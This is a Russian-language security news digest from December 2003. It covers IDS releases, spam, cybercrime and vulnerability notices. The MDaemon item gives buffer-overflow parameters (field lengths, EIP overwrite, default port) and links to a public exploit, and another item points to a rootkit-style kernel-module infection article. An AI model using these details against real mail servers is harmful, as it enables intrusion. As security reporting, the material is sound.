|
31/12/2003 17:35 C Новым 2004 Годом!
Команда UINC поздравляет всех посетителей нашего сайта, а также коллег по компьютерной безопасности с Новым 2004-м Годом! По поводу того, что принёс нам предыдущий (пока ещё не ушедший) 2003-й год было сказано довольно много в различных новостях, которые мы публиковали, поэтому не будем повторяться. Хотелось бы, чтобы в новом году спам наконец-то победили, черви и вирусы вызывали не очень разрушительные последствия, а уязвимостей в различных ОС становилось бы всё меньше и меньше (если это возможно). В прошедшем году нашей командой было написано несколько, надеемся полезных, статей на различные темы. Было выпущено 2383 новости (общее количество которых достигло 4944 - так что, как миниумум 5000-я новость в следующем году нам гарантирована :)). Надеемся также постоянно радовать всех вас свежими и актуальными новостями, а также различными полезными программами. Желаем всем вам в наступающем году побольше стабильности в финансовом и семейном плане, а также (что немаловажно) дальнейшего профессионального роста! Ну и главное, конечно же, здоровья! Также хотелось бы заранее извиниться за то, что завтра мы не выпустим ежедневного выпуска новостей по вполне понятным причинам. ;) Источник - МЫ
31/12/2003 17:09 Windows на смартфоне – первые шаги.
Рынок беспроводных устройств и смартфонов, по мнению аналитиков, скоро перейдет в фазу резкого роста, и, естественно, многие фирмы стремятся занять хорошую позицию на нем. Особенно интересен рынок смартфонов – устройств сочетающих в себе свойства сотового телефона и КПК – именно на этот рынок теперь и стремится компания Microsoft со своей новой операционной системой Smartphone OS. Новая модель телефона от компании Motorola, MPx200, первый выстрел в направлении нового рынка. Фирма Samsung, кроме того, производит модель i600, используемую в сетях оператора Verizon Wireless. Главная цель – полная интеграции с настольным компьютером. Хотя не всем нравится идея компании создать «миниатюрный Windows», но во многом такое решение оправдано. Особенно приятно работать с электронной почтой: если не принимать в расчет неудобства при написании писем, Smatphone OS предлагает очень удобный механизм синхронизации. Источник - http://www.mobile-review.com
31/12/2003 16:24 Выход Snort 2.1.0.
Jeremy Hewlett от имени разработчиков проекта Snort сообщает о выходе новой версии этой популярной системы обнаружения попыток вторжений (IDS) - 2.1.0. В новой версии: новый модуль отслеживания соединений (connection tracking), новый детектор сканирования портов, новый препроцессор протокола HTTP (HttpInspect), а также новый правила и сигнатуры атак. Подробности - http://www.snort.org./
31/12/2003 15:17 Уязвимость в MDaemon.
Группа исследователей компьютерной безопасности Hat-Squad сообщает об обнаружении уязвимости в популярном в мире Windows почтовом (SMTP) сервере MDaemon. Уязвимость существует в CGI-составляющей этого сервера FORM2RAW.exe, предназначенной для отправки почтового сообщения через Вэб (заполнив соответствующую форму). При заполнении поля "From" более чем 153 байтами происходит переполнение буфера в стеке. Перезапись регистра EIP происходит при длине поля более 249 байт. Также отмечается, что FORM2RAW.exe доступен по умолчанию в Вэб-сервере WorlClient и при этом висит на 3000-м порту. Группой выпущен эксплоит для платформы win32. Подробности - http://packetstorm.linuxsecurity.com/0312-exploits/mdaemon-raw.txt
31/12/2003 15:04 Компьютерные вирусы: комментарии и прогнозы.
Специалисты по компьютерной безопасности оценивают 2003 год как худший, с точки зрения распространения компьютерных вирусов, хотя ни до каких существенных нововведений в написании этих вирусов их авторы пока не додумались, пишет Wired News. По имеющимся данным, вирусы 2003 года стали причиной, помимо прочего, ухудшения работы авиалиний, железных дорог и систем банкоматов, сбоев в работе критических компьютерных систем в больницах и как минимум одной атомной электростанции. Как отметил в интервью Wired News директор компании F-Secure Микко Хиппонен, больше всего пугает тот факт, что ни Blaster, ни Slammer не задумывались для подрыва важнейших систем, а запрограммированы были только на распространение (которое и привело в итоге к сбоям). «Представьте себе, как бы все обернулось, если бы черви несли еще вредоносную программу», - сказал Хиппонен. По оценкам экспертов, наиболее пугающая тенденция 2003 года - союз вирусописателей и спаммеров, в результате которого возникают вирусы, одновременно заражающие компьютеры и в огромных количествах рассылающие спам. Оценивая эффект, произведенный вирусами BugBear, Blaster, Slammer, Sobig.F и Swen, специалисты полагают, что в 2004 году следует ожидать развития этой тенденции - и, соответственно, еще больших проблем. Источник - http://www.crime-research.ru
31/12/2003 15:00 Берегитесь книг - источников знаний.
Как сообщается на www.bugtraq.ru, ФБР разослало бюллетень, призывающий полицейских проявлять особое внимание к лицам, изучающим альманахи, путеводители, карты и т.п. К счастью, отмечается, что использование карт может быть и вполне безопасным занятием - если не сочетается с подозрительным поведением. Подробности - http://www.theregister.co.uk/content/28/34675.html
31/12/2003 14:32 Kaspersky® Anti-Spam ISP Edition.
"Лаборатория Касперского" представила новое средство защите от нежелательных электронных рассылок, разработанное специально для фильтрации спама на уровне провайдеров интернет-сервиса - Kaspersky® Anti-Spam ISP Edition. Данный продукт является логичным дополнением линейки антиспамовых продуктов "Лаборатории Касперского", позволяющий организовать высокоэффективную систему фильтрации спама для больших объемов данных. Kaspersky Anti-Spam ISP Edition является достойным ответом на возросшую активность спам-рассылок. С одной стороны, продукт позволяет интернет-провайдерам решить проблему перегрузки системных мощностей из-за необходимости пересылки гигантских объемов спама. С другой, существенно поднять конкурентоспособность оказываемых услуг, предлагая пользователям централизованную защиту от непрошеных рекламных рассылок. В результате клиенты освобождаются от необходимости тратить время на отсеивание ненужных писем, оплачивать спам-трафик, снижается риск потери деловых писем. Kaspersky Anti-Spam ISP Edition, функционирующий на платформах Linux и FreeBSD - высокоинтеллектуальное средство фильтрации нежелательной электронной корреспонденции на уровне интернет-провайдера. Система осуществляет распознавание и фильтрацию нежелательных почтовых сообщений в процессе приёма электронной почты по протоколу SMTP. Таким образом, отсеивание спама производится до того, как сообщения будут доставлены в почтовый ящик конечного получателя. Kaspersky Anti-Spam ISP Edition оказывает минимальное влияние на производительность системы за счет оптимизации продукта для применения в условиях работы ISP-провайдера. Источник - http://www.kaspersky.ru
31/12/2003 14:04 Продуктом 2003 года назван спам.
Американские аналитики из компании Basex присвоили незапрашиваемой электронной почте — спаму, как явлению — титул «Продукт года». По их мнению, ни одно «изделие» не повлияло на бизнес во всём мире в такой степени. Объёмы денег, вкладываемые в разработку новых технологий спама, и — самое важное — в обратный процесс защиты от от него растут экспоненциально. Ущерб же от забитых каналов связи, перегруженных серверов и покупок новых версий защитного «софта», по оценкам специалистов, составил в прошедшем году около $20 миллиардов. Из них $600 миллионов было потрачено только на коммерческие программные продукты защиты (в следующем году будет уже 2 миллиарда). По оценкам Basex, количество спама и связанных с ним проблем за год удвоилось. Поэтому не исключена возможность того, что спам станет «Продуктом года» и в 2004 году. Источник - http://www.securitylab.ru
31/12/2003 13:46 Правительство Израиля отказывается от продуктов Microsoft в целях экономии.
Во вторник представитель израильского Министерства финансов объявил, что правительство отказывается от приобретения программного обеспечения компании Microsoft, сообщает агентство Associated Press. Правительство также намерено стимулировать разработку более дешевых программных продуктов, способных заменить те, что предлагает Microsoft. В связи с этим решением Министерство финансов Израиля начало сотрудничество с компаниями Sun Microsystems и IBM для разработки бесплатно распространяемого приложения OpenOffice на иврите, которое заменит Microsoft Office. Как пояснил пожелавший остаться неназванным источник в правительстве, решение отказаться от продуктов Microsoft носит чисто экономический характер. Кроме того, власти надеются, что с распространением бесплатного программного обеспечения в Израиле увеличится число компьютерных пользователей. По словам источника, в частности правительство было не довольно тем, что Microsoft отказывается продавать пакет программ по частям, когда весь набор приложений не нужен. Уже установленные программы удаляться не будут, однако закупка их более новых версий не планируется. В компании Microsoft пока никак не прокомментировали эту информацию. Подробности - http://story.news.yahoo.com/news?tmpl=story...
30/12/2003 14:05 Написание собственного спам-фильтра на Perl.
На сайте freebsdaddicts.org опубликована интересная статья, которая описывает процесс написания (и подключения затем) собственного спам-фильтра на языке Perl. Для того, чтобы написать скрипт, приведённый в статье, необходимы модули Mail
30/12/2003 14:01 Онлайн-преступность растет.
Как сообщает правительственная американская некоммерческая организация Internet Fraud Complaint Center (название можно перевести как "Центр приема жалоб на случаи мошенничества в итнернете"), в уходящем году число жалоб на различных онлайн-мошенников, поданных через сайт Центра, превысило 120 тыс., что на 60% больше, чем в 2002 году. Данный факт может свидетельствовать как о том, что мошенников стало больше и они стали изощреннее, так и о том, что число их потенциальных жертв увеличилось. Штаб-квартира Центра расположена в американском штате Западная Виржиния, там работают 62 человека, занимающиеся анализом жалоб пользователей и передающие их для расследования в ФБР или другие компетентные органы. Источник - http://www.cnews.ru
30/12/2003 13:27 Метод инфицирования системных модулей ядра Linux.
На сайте opennet.ru опубликована довольно интересная и полезная статья, автор которой (leePetitPrinces) описывает технологии вставки закладок в системные модули ядра, на примере Linux ядер 2.4.х серии. Как пишет сам автор, "данный материал не является чем-то новым. Но он является новым для автора и ему хочеться поделиться этим с другими. Ему так же интересны ваши отзывы, так как автор является новичком в подобных вещах и он готов выслушать разумные и адекватные комментарии". Как знают ммногие посетители нашего сайта, подобная технология используется во многих руткитах для ОС Linux, так что статья, несомненно, представляет интерес для специалистов в области компьютерной безопасности. Статья - http://www.opennet.ru/base/dev/infect_lkm.txt.html
30/12/2003 13:02 Microsoft предостерегает против Интернета.
Компания Microsoft спешит предупредить всех новоиспеченных обладателей компьютеров о том, чтобы их не использовали для выхода в Интернет. Объясняется это довольно просто. Дело в том, что обычно в фирмах по продажам компьютеров предустанавливается операционная система в ее изначальном виде. Т.е. без дополнительных патчей, исправляющих дыры в защите безопасности. А поэтому любая версия Windows, установленная на новом персональном компьютере будет открыта для всевозможных вирусных атак, которые для защищенного компьютера не страшны. Так как довольно много людей в качестве подарка на рождество получают именно компьютер – специалисты прогнозируют возможный всплеск таких отгремевших вирусов, как Sobig и Blaster. Решить проблему, с точки зрения Microsoft, довольно просто – нужно всего-лишь купить какой-нибудь антивирусный пакет, который, правда тоже должен быть со всеми обновлениями. Каким образом выкачивать эти обновления не входя в Интернет, Microsoft не сообщает. Источник - http://www.bugtraq.ru
30/12/2003 12:21 Интервью с Евгением Касперским.
На сайте www.bugtraq.ru опубликовано интервью с Евгением Касперским, основателем и директором "Лаборатории Касперского", которая известна своим антивирусным и противоспамесрким софтом. Интервью брал mindw0rk. Кстати на том же самом сайте выложено также интервью с Дмитрием Леоновым ака dl - тоже рекомендуем почитать. ;) Интервью - http://www.bugtraq.ru/library/misc/kasper.html
30/12/2003 11:27 Wi-Fi Tracker следит за пользователями.
Система Wi-Fi Tracker, разработанная National Scientific Corporation, позволит системным администраторам отслеживать местоположение абонентов с точностью до метра. Система Wi-Fi Tracker представляет собой небольшое устройство размером с карманную радиостанцию и является побочным продуктом, появившимся в ходе разработки платформы беспроводной связи DarkStar. Прибор, весящий около 250 гр., может крепиться либо к поясу человека, местоположение которого всегда должно быть известно наблюдающему, либо к какому-нибудь особо ценному прибору, который жалко потерять. В совокупности с программным пакетом Ekahau Positioning Engine, Wi-Fi Tracker позволяет отслеживать местоположение наблюдаемого с точностью до одного метра. Впервые эта технология была продемонстрирована на майской выставке Wi-Fi Planet Conference and Expo. По информации Techweb.com, первые ознакомительные образцы Wi-Fi Tracker, необходимые для создания полнофункциональной системы слежения за пользователями, уже можно приобрести у компании National Scientific Corporation. Источник - http://www.internet.ru
30/12/2003 11:01 Microsoft урегулировала патентный спор из-за графической доски.
Microsoft согласилась выплатить 60 млн долл. и лицензировать у истца технологию графической доски, после того как жюри присяжных вынесло твердый, хотя и не окончательный приговор против софтверного гиганта. По мировому соглашению, которое было анонсировано в среду компанией SPX и ее подразделением Imagexpo, Microsoft получает право использовать технологию, описанную в патенте #5,206,934 «Способ и устройство для проведения интерактивных компьютерных конференций». 14 ноября окружной суд США в Ричмонде (штат Вирджиния) постановил, что своим программным обеспечением NetMeeting Microsoft нарушила патент, и потребовал компенсировать SPX ущерб в размере 62,5 млн долл. Так как суд еще не вынес окончательного решения по данному делу, у софтверного гиганта оставалась возможность урегулировать тяжбу на более выгодных условиях. Microsoft провела большую часть года, защищаясь от патентных исков, однако вердикт по делу SPX бледнеет перед победой Калифорнийского университета и компании Eolas в процессе о нарушении патента на технологию плагинов в веб-браузере. Источник - http://www.zdnet.ru
30/12/2003 10:45 Кибер-вымогатели устроили охоту за офисными служащими.
Все большую моду в Европе приобретает кибер-шантаж, мишенью которого становятся офисные служащие, сообщает агентство Reuters. Вымогатели присылают сообщения по электронной почте с требованиями заплатить небольшую сумму выкупа, как правило 20-30 евро. В противном случае они угрожают уничтожить все документы на компьютере жертвы или разместить там изображения с детской порнографией. Преступники утверждают, что они имеют доступ в корпоративную компьютерную сеть, и жертвы обычно предпочитают перевести небольшую сумму на банковский счет шантажиста, опасаясь исполнения угрозы. Специалисты по борьбе с кибер-преступностью советуют ни в коем случае не идти на поводу у вымогателей. Если преступники увидят, что жертва проявляет слабость, то в следующий раз они потребуют заплатить уже гораздо больший выкуп. Полиция считает, что такого рода преступления с трудом поддаются раскрытию. Так как сумма выкупа невелика, люди предпочитают заплатить и не сообщать о случившемся органам правопорядка. Источник - http://www.lenta.ru
29/12/2003 16:37 В список самых ярких достижений интернета за 2003 год вошли семь новых сервисов.
Американская газета Washington Post опубликовала список интернет-достижений 2003 года. В него вошли семь веб-cервисов: платный музыкальный сервис iTunes, служба знакомств Friendster, телефонный сервис компаний Vonage и Skype, поиску по тексту книг от Amazon.com, сервис Blogs от Google, файлообменная сеть Kazaa и виртуальный мир There. Подробности - http://www.washingtonpost.com/wp-dyn/articles/A33690-2003Dec27.html
29/12/2003 15:27 28 декабря Линусу Торвальдсу исполнилось 34 года.
Вчера одному из, пожалуй, самых знаменитых личностей в компьютерном мире (не считая Билла Гейтса, естественно ;))), Линусу Торвальдсу исполнилось 34 года. Он родился 28 декабря 1969 г. в Хельсинки (Финляндия) в семье журналистов. Самым важным его вкладом в компьюерные технологии по праву можно считать создание операционной сисстемы Linux, которая была им создана в 22-летнем возрасте (в 1991 году). В приведённой ниже ссылке вы можете ознакомиться с деталями личной биографии Линуса из интервью, которое он дал Marjorie Richardson в 1999 году. Интервью - http://www.linuxjournal.com/article.php?sid=3655
29/12/2003 14:24 Уязвимость в 'indent'.
Переполнение буфера обнаружено в утилите 'indent'. Пользователь может выполнить произвольный код при обработке специальным образом написанного С-файла. Переполнение буфера обнаружено в функции handle_token_colon(). Пользователь может сконструировать специально обработанный С-файл, который, когда будет обработан целевым пользователем, с использованием 'indent' приложения, выполнит произвольный код с привилегиями этого пользователя. Источник - http://www.securitylab.ru
28/12/2003 19:01 Трансатлантические SMS.
Американский оператор Verizon Wireless и компания Vodafone создали новый сервис – обмен SMS через Атлантику. Это соглашение позволит абонентам CDMA сети Verizon в США обмениваться текстовыми сообщениями с абонентами GSM сетей Vodafone. Изначально сервис будет доступен только в 10 сетях Vodafone (Германия, Греция, Ирландия, Италия, Нидерланды, Новая Зеландия, Португалия, Испания, Швеция и Великобритания), но в течение 2004 года произойдет расширение на остальные страны, в которых работает компания. Каждое текстовое сообщение будет конвертироваться из одного стандарта в другой средствами американской компании InphoMatch. Предполагается, что процесс передачи будет занимать не более нескольких секунд. Джон Страттон (John Stratton), вице-президент Verizon, заметил: «Мы стараемся сделать мир для наших клиентов немного меньше, приблизив их друг к другу.» Источник - http://www.mobile-review.com
28/12/2003 18:38 Выход MySQL 5.0.0.
Cообщается о выходе совершенно новой версии СУБД MySQL 5.0.0, пользующейся огромной популярностью в ОС с открытым исходным текстом (Linux, FreeBSD etc). Представляет альтернативу известной MsSQL (производства сами-знаете-кого) для работы с реляционными базами данных на языке структурированных запросов SQL. CУБД доступна как в виде исходных кодов, так и в прекомпилированном виде. Подробности - http://www.mysql.com/downloads/
28/12/2003 17:09 Россия: с 1 января запрещены телефроны, работающие в районе 900 МГц.
В нашей стране намечается еще одна революция... Минсвязи России решил запретить телефоны, работающие в полосе частот 814–815 МГц и 904–905 МГц. Ввоз из-за границы таких аппаратов должен быть прекращен с 1 января 2004 года, а производство в нашей стране должно быть прекращено с 1 января 2005 года. Государственная комиссия по радиочастотам рекомендует оставить только 30–41 МГц, 864–868,2 МГц и 1880–1900 МГц аппараты. Источник - http://www.oxpaha.ru
28/12/2003 16:07 Виртуальные мошенники облапошили сограждан на 400 тысяч долларов.
Сотрудники управления по борьбе с экономическими преступлениями УВД Калужской области пресекли деятельность межрегиональной преступной группы, члены которой специализировались на мошенничествах в крупных размерах. Злоумышленники разместили в Интернете сайт, на котором предлагали услуги по поставке металлопродукции. Покупателей привлекали заниженные цены на товар, поэтому клиентов всегда хватало. Вот так, через Интернет представители одной из калужских фирм и нашли потенциального поставщика металлопродукции. Им оказалась некая организация со звучным названием "Техпроект", которая располагалась в Челябинске. Проверив фирму, калужские коммерсанты выяснили, что у нее действительно заключен договор поставки с Магнитогорским металлургическим комбинатом. Поскольку цены на товар в "Техпроекте" выглядели весьма привлекательно, было принято решение о заключении сделки. Набрав челябинский номер, предприниматели невольно перешли в разряд потенциальных жертв мошенников. Как рассказали корреспонденту REGIONS.RU в отделе информации и общественных связей УВД Калужской области, в тот момент, когда калужские менеджеры связывались с представителями в Челябинске, они фактически разговаривали с людьми, которые находились в Москве. Современное оборудование, средства мобильной связи позволяют совершать такого рода обманы. С покупателями общались грамотные, знающие люди, владеющие терминологией и металлопроката, и железнодорожных перевозок. В дальнейшем, полностью доверяя людям, которые якобы находились в Челябинске, предприниматели перечисляли средства на расчетный счет в этот город. На следующий день финансы уходили в Москву, где существовала фирма, собиравшая на своем расчетном счете деньги от обманутых физических и юридических лиц, желающих приобрести металлопрокат. В столице средства обналичивались. Подробности - http://www.crime-research.ru/news/2003/12/2701.html
28/12/2003 15:59 Cтатья о защите Perl.
На сайте Дмитрия Леонова bugtraq.ru в рамках конкурса статей опубликована статья Романа Чертанова под названием "Защищаем Perl: шунт в мозг, или зверская нейрохирургия". Язык программирования Perl, будучи установленным на Web-сервере, отличается высокими требованиями к внимательности разработчика и квалификации системного администратора, при малейшей ошибке человека оставляя систему "открытой и доступной" для взломщиков всего мира. В статье рассмотрена возможность снизить угрозу, устанавливая свои собственные защитные механизмы (на примере "хирургического отрезания" и перехвата функций чтения, записи и выполнения файлов в системе Windows). Статья - http://www.bugtraq.ru/library/programming/safeperl.html
28/12/2003 15:21 Описание структуры файловой системы EXT2.
На сайте LowLevel.ru, который посвящён низкоуровневому программированию и разработке операционных систем опубликована статья в 2-х частях, в которой описывается архитектура файловой системы ОС Linux - EXT2. Сейчас ей на смену приходят журналируемые файловые системы: EXT3, ReiserFS, XFS. Тем не менее, статья наверняка придётся по вкусу программистам и разработчикам операционных систем. Автор статьи скрывается под псевдонимом "uncle Bob". Статья - http://www.lowlevel.ru/
28/12/2003 14:39 Проверим Linux на прочность?
Как сообщает linuxcenter.ru, на сайте IBM опубликована статья "Putting Linux reliability to the test" ("Тестируем надежность Linux"). Исследователи проверяли, как поведет себя ядро ОС и другие ключевые компоненты (библиотеки, драйвера) при длительной нагрузке. Тестирование, основной результат которого ("Linux сохранил надежность и стабильность в течение длительного периода времени и может использоваться для создания корпоративной рабочей среды") весьма радует, проводилось в течение трех месяцев. Подробности - http://slashdot.org/article.pl?sid=03/12/26/1829258
27/12/2003 20:47 Статья о "червях".
На сайте "Ф-Центра" опубликована довольно интересная статья известного в мире андэграунда товарища Криса Касперски (просьба не путать с Евгением Касперским). Называется она - "Укрощение "червей" или синдром врожденного иммунодефицита". Вот, что пишет сам автор в предисловии: "На фоне повальной эпидемии Интернет-"червей" представляется весьма уместным рассказать как о механизмах их распространения, так и о способах выявления, предотвращения и удаления "заразы". Насколько мне известно, до сих пор нет ни одной статьи, в полной мере освящающей эту проблему. Большинство авторов в основном упираются в несколько вирусов, и в качестве основного средства лечения предлагают использовать антивирус, что во-первых сильно смахивает на рекламу (антивируса), а во-вторых, подавляющее большинство пользователей крайне неохотно и не оперативно обновляют антивирусные базы, в результате чего беда не заставляет себя ждать". Содержание: История; Современная ситуация; Механизмы распространения червей; Методики противодействия вирусам; Методики обнаружения; Методики удаления; Заключение. Cтатья - http://www.fcenter.ru/articles.shtml?utilities/8230
27/12/2003 19:44 Вирусные итоги очередного года.
"Лаборатория Касперского" подвела вирусные итоги очередного года. Собравшиеся на пресс-конференцию журналисты слушали доклад основателя одноименной антивирусной компании с повышенным вниманием: не будет ли новых сенсаций? Прошлогодние прогнозы Касперского сбылись на все сто. И Касперский не обманул ожиданий любителей мрачных пророчеств. Год назад Евгений Касперский рассказывал про флэш-червей, способных распространяться по Сети с устрашающей скоростью. Спустя считанные дни его предсказания сбылись. В конце января сетевой вирус Slammer за несколько минут заразил сотни тысяч компьютеров по всему миру. Кстати, сам Касперский клянется, что не ждал такого скорого исполнения собственного пророчества и был шокирован не меньше остальных. Впрочем, по его словам, удивляться не приходится, ведь он не занимается гаданием на кофейной гуще, а анализирует тенденции. Так какие же тенденции наблюдались в этом году? Самые безрадостные. Касперский делает далекоидущий вывод: интернетом заинтересовался мировой криминал! Написание вирусов становится бизнесом, и довольно прибыльным бизнесом. А там, где деньги добываются незаконно, всегда найдется тот, кто дело организует. Подробности - http://sysadmins.ru/news/index.php?news=773
27/12/2003 19:01 Microsoft задерживается с работой над ошибками.
Microsoft не выпустит ежемесячный патч в декабре. Софтверный гигант заявил, что в этом месяце не будет выпущено традиционного пакета обновлений, с заплатками к системам безопасности. В ноябре и декабре несколько новых брешей в защите было обнаружено исследователями из разных стран. Microsoft заявляет, что до сих пор исследует данные проблемы и не успевает приготовить соответствующих исправлений. «Это не означает, что мы ничего не делаем. Мы всего лишь не успеваем подготовить патч к сроку», оправдывается глава Microsoft по безопасности программ. Он также заявил, что компания тратит все силы на то, чтобы повысить качество своих обновлений. В октябре Microsoft обязалась делать патчи чаще чем обычно и выпускать их ежемесячно. И вот теперь компания заявляет о том, что пропускает очередной срок. Вместе с тем, несколько дыр в системах безопасности, о которых стало известно с момента последнего обновления, включающих в себя 7 брешей в защите браузера Internet Explorer до сих пор изучаются корпорацией. Источник - http://www.km.ru
27/12/2003 18:15 Conectiva представила Linux-дистрибутив с ядром 2.6.
Компания Conectiva, лидирующая Linux-компания Латинской Америки, представила общественности Conectiva Linux Technology Preview. Это первая версия Linux-дистрибутива компании с ядром 2.6. Рассчитан CLTP, естественно, на пользователей и разработчиков, желающих познакомиться с новой технологией, которая появится в Beta-версии следующего Conectiva Linux, запланированного на выход в середине 2004 года. Подробности - http://www.nixp.ru/cgi-bin/go.pl?q=news;n=3075
27/12/2003 17:09 Выход электронного журнала "Спамтест" No. 30.
Вышел очередной (30-й) номер электронного журнала "Спамтест", "Национальной коалицией против спама: "Лаборатория Касперского", Microsoft, Rambler, Mail.ru, Golden Telecom, Subscribe.ru, "Ашманов и Партнеры". В этом номере: новости с фронта борьбы со спамом, cпам и корпорации - выгода для одних, ущерб для других. Подробности - http://www.kaspersky.ru/news.html?id=144772822
27/12/2003 16:36 Новая высокоскоростная сеть свяжет США, Россию и Китай.
Вскоре все Северное полушарие будет охвачено новой сетью для высокоскоростной передачи данных, сообщает "Компьюлента". Она протянется из Чикаго в Амстердам, оттуда в Москву и через Сибирь в Пекин, а затем в Гонконг. Гонконг, в свою очередь, будет связан с Соединенными Штатами. В Чикаго сеть замкнется в единое кольцо. Проект создания сети получил название Little GLORIAD (Global Ring Network for Advanced Application Development). Скорость передачи данных в такой сети составит до 155 Мбит/с. Финансирование каждого из сегментов сети стороны осуществляют самостоятельно. Работы по созданию американской части сети финансирует Национальный научный фонд США, а координирует Национальный центр суперкомпьютерных приложений (NSCA), расположенный в Университете штата Иллинойс в Урбана-Шампейне. По словам представителя центра Грега Коула, работы по созданию сети в США обошлись в 2,8 млн. долларов. Примерно столько же, по словам Коула, стоят российский и китайский сегменты сети. Основные работы по созданию сети были завершены несколько месяцев назад. В настоящее врем ведется доводка соединения между российской и китайской частями сети. В эксплуатацию сеть вступит уже 5 января, а официальная церемония ее открытия состоится 12 января в Пекине. Главным применением новой сети станет обмен научной информацией. В перспективе, стороны планируют построить еще более мощную сеть GLORIAD с пропускной способностью в 10 Гбит/с. Подробности - http://story.news.yahoo.com/news?tmpl=story&cid=528&ncid=528...
27/12/2003 15:43 Бразильские хакеры провели новую атаку на сайты НАСА.
Сайты Национального управления США по аэронавтике и исследованию космического пространства (НАСА) 24 декабря подверглись новой атаке бразильских хакеров. Инцидент произошел спустя ровно неделю после аналогичного происшествия с веб-ресурсами НАСА, сообщает сайт индийской газеты The Hindu. Новая атака бразильской хакерской группы drwxr оказалась не столь масштабной, как предыдущая. На сей раз внимание бразильцев привлекли два сайта, а не 13. На сайтах cosmo.nas.nasa.gov и marsoweb.nas.nasa.gov хакеры разместили предложение "Война в Ираке, убийство - игра!" и пожелали всем "яркого и красивого Рождества". Технические специалисты быстро устранили последствия новой атаки бразильских хакеров. Атакованные веб-страницы входили в число 13 сайтов, привлекших внимание группы drwxr 17 декабря. Источник - http://www.viruslist.com
26/12/2003 17:57 SCO сама нарушает авторские права на Linux?
Письма SCO Group, адресованные пользователям Linux, о нарушении авторских прав компании были подвергнуты критике со стороны создателя ОС Линуса Торвальдса. Просмотрев 65 файлов, которые по версии SCO были скопированы из UNIX, Торвальдс заявил, что собственноручно писал некоторые из них, будучи начинающим программистом на С в 1991 году. Надо сказать, что сейчас ситуация вокруг лицензирования Linux осложнилась тем, что один из владельцев прав на UNIX - компания Novell - заявила об актуальности своего владения до сих пор. Novell, занимающийся сейчас оформлением сделки по поглощению таких известных команд из «лагеря» открытого кода, как SuSE и Ximian, отмечает тот факт, что SCO была в курсе сохранения прав собственности за Novell и во время своих публичных заявлений. Таким образом, SCO могут обвинить не только в недостоверности фактов, но и нарушении авторских прав уже с её стороны. Источник - http://www.cnews.ru
26/12/2003 13:22 Россия: с 1 января запрещены телефроны, работающие в районе 900 МГц.
В нашей стране намечается еще одна революция... Минсвязи России решил запретить телефоны, работающие в полосе частот 814–815 МГц и 904–905 МГц. Ввоз из-за границы таких аппаратов должен быть прекращен с 1 января 2004 года, а производство в нашей стране должно быть прекращено с 1 января 2005 года. Государственная комиссия по радиочастотам рекомендует оставить только 30–41 МГц, 864–868,2 МГц и 1880–1900 МГц аппараты. Источник - http://www.oxpaha.ru
26/12/2003 13:05 Украина создает спецподразделение по борьбе с кардерами.
Украина создаст специализированное подразделение по борьбе с преступлениями в сфере платежных карт, которое будет координировать свою деятельность с банковской, правоохранительной и судебной системами. Этот вопрос обсуждался на днях в ходе *круглого стола* на тему *Вопросы выявления и расследования преступлений с использованием платежных карт* с участием представителей ЕМА, международной платежной системы MasterCard Int., Генеральной прокуратуры и Министерства внутренних дел Украины. Стороны договорились в частности, провести в 2004 году серию специализированных межведомственных тренингов на базе крупных банков; подготовить методические материалы для стандартизации действий банков и спецслужб в процессе предотвращения, противодействия и раскрытия *карточных* преступлений. Источник - http://www.crime-research.ru
26/12/2003 12:26 Идеальная настройка FreeBSD сервера.
На сайте opennet.ru опубликована ссылка на довольно интересное руководство в 4 частях в котором собраны наиболее полезные сведения по настройке FreeBSD и решении задач системного администрирования: 1 часть - Services and Updating; 2 часть - System Security and User Management; 3 часть - Services and Firewalling; 4 часть - Tools and Security awareness. 1 часть - http://bsdhound.com//newsread.php?newsid=101 2 часть - http://bsdhound.com/newsread.php?newsid=106 3 часть - http://bsdhound.com/newsread.php?newsid=109 4 часть - http://bsdhound.com/newsread.php?newsid=113
26/12/2003 12:11 "Одноразовый" почтовый сервис.
Суть "одноразового" почтового сервиса заключается в самоуничтожении почтового логина после его использования. Подобная услуга может понадобиться, например, для получения ключа либо закрытой ссылки для доступа к определённому Интернет-русурсу (скачать драйвер, например). Причем главное в этой регистрации - указание вами своего e-mail'а. Обычно после такой регистрации в лучшем случае вы начинаете получать на адрес указанного почтового ящика различные рекламные предложения данного сервиса, а в худшем случае - вам на него начинает тоннами валиться всякий спам. Указать несуществующий e-mail - не получится, потому что пароль для доступа высылается именно на указанный e-mail - это самый простейший способ проверки. По адресу www.ipmouse.com открыт еще один подобный сервис, сообщается в информационном листке "Лаборатории Касперского". Новый сервис работает довольно интересным образом. При регистрации в том или ином месте вы просто вписываете в регистрационную форму любой адрес на сервере @ipmouse.com. Желательно только, чтобы этот адрес был не очень распространенный - например, zbm192@ipmouse.com, d192847w@ipmouse.com и так далее. Заметьте, что заранее заводить этот ящик на ipmouse.com вам не нужно! После регистрации заходите по адресу ipmouse.com, вводите только указанный вами адрес ящика (безо всяких паролей) и проверяете почту. Дело в том, что ящик с таким именем на этом сервисе заводится всего на 24 часа. Причем заводится или в момент получения письма на данный адрес, или в момент попытки входа на этот ящик с сайта. Так как не нужны пароли - не нужны регистрации. Вы просто заходите, читаете присланный пароль к услуге или нажимаете ссылку, которую они прислали, после чего о ящике забываете навсегда - через 24 часа он самоуничтожится. Сайт сервиса - http://www.ipmouse.com/
26/12/2003 11:16 Microsoft предложила новый способ борьбы со спамом.
Microsoft выступила с предложением, суть которого заключается в методе борьбы со спамом путем введения платы за отправляемые письма. Причем расплачиваться нужно будет не деньгами, а процессорным временем. В частности, компьютер отправителя, прежде чем сообщение будет доставлено адресату, будет вынужден решить небольшую логическую задачу и направить результат серверу. Поиск ответа займет от 10 до 20 секунд: это совершенно незаметно для пользователя, но критично для служб массовых рассылок. Например, за сутки в этом случае можно будет распространить около 8000 посланий, тогда как обычно спамеры рассылают до нескольких миллионов сообщений. Конечно, проект, получивший название Penny Black, вряд ли решит проблему полностью, но частично уменьшить количество мусора в почтовых ящиках, скорее всего, все же удастся. Кстати, Microsoft борется со спамерами и на законодательном уровне. Например, недавно софтверный гигант подал иск против маркетинговой фирмы Synergy6, обвиняющейся в нарушении законов штатов Нью-Йорк и Вашингтон. Эта компания рассылала письма с поддельными обратными адресами и ложными темами сообщений, предлагая бесплатные товары в обмен на личную информацию. Подробности - http://news.bbc.co.uk/2/hi/technology/3324883.stm
25/12/2003 23:07 Хакеры в очередной раз положили сервер агентства "Чеченпресс".
